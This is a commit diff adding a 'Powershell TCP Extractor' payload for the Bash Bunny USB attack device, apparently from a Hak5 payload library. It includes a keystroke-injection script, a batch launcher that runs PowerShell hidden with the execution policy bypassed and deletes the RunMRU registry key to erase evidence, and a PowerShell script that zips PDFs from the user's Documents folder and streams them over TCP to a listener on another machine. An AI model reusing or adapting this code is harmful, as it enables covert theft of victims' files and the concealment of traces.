Added PowershellTCPExtractor (#144)

payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1

@@ -0,0 +1,34 @@
+#edit ip and port of your listener... listener is on the machine you want to send data to... I use netcat as listener... (example command on kali.. [nc -l -p 54321 > out.file])
+[int] $Port = 54321
+$IP = "192.168.222.63"
+#edit this to specify your target
+$rootFolder = "$ENV:UserProfile\Documents"
+#edit include to specify filetypes...(*.doc*,*.txt,*.jpg) whatevs...
+$files = Get-ChildItem -Path $rootFolder -Include *.pdf -Recurse
+
+#only edit under this if you know what you are doing
+#temp location to perform file copy and zip
+$tempFolderRoot = $env:APPDATA
+$tempFolderFinal = $tempFolderRoot+"\"+$env:UserName+"-Docs"
+New-Item -ItemType directory -Path $tempFolderFinal -Force
+foreach($file in $files)
+{Copy-Item "$file" -destination $tempFolderFinal}
+$CompressionToUse = [System.IO.Compression.CompressionLevel]::Fastest
+$IncludeBaseFolder = $false
+$zipTo = "{0}\{1}.zip" -f $tempFolderRoot,"ZIPPED"
+[Reflection.Assembly]::LoadWithPartialName( "System.IO.Compression.FileSystem" )
+[System.IO.Compression.ZipFile]::CreateFromDirectory($tempFolderFinal, $ZipTo, $CompressionToUse, $IncludeBaseFolder)
+$Address = [system.net.IPAddress]::Parse($IP) 
+$socket = new-object System.Net.Sockets.TcpClient
+$socket.connect($Address, $port)
+$stream = $socket.GetStream()
+$file = Get-Item $Env:APPDATA\ZIPPED.zip
+$fileData = [IO.File]::ReadAllBytes($file)
+$stream.Write($fileData, 0, $fileData.Length)
+$stream.Close()
+$Socket.Close()
+
+#clean up temp files
+Remove-Item $tempFolderFinal -RECURSE
+Remove-Item $Env:APPDATA\ZIPPED.zip
+  

payloads/library/Powershell_TCP_Extractor/d.cmd

@@ -0,0 +1,10 @@
+@echo off
+
+Rem run powershell script with bypass,nologo, and hidden flag
+Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
+
+REM Delete registry key storing Run dialog history...to clean up evidence
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+@cls
+@exit

payloads/library/Powershell_TCP_Extractor/payload.txt

@@ -0,0 +1,21 @@
+#!/bin/bash
+#
+# Title:         Powershell Extractor
+# Author:        $irLurk$alot
+# Version:       1.0
+# Target:        Windows
+# 
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn runs powershell script to copy move and extract data.
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R 100
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+LED R B 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+LED R G B

payloads/library/Powershell_TCP_Extractor/readme.md

@@ -0,0 +1,24 @@
+# Powershell TCP extractor for Bash Bunnys
+
+* Author: $irLurk$alot
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine
+
+## Configuration
+The payload copies target to %APPDATA%, change this to wherever you like by editing powershell script, 
+it then zips data and sends data to listener on a remote machine, also specified in powershell script.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red                | Attack Setup                                 |
+| Purple             | Attack Execution                             |
+| White              | Attack Complete (safe to remove Bunny)       |
+|					 | Script will continue to run and transmit		|	
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")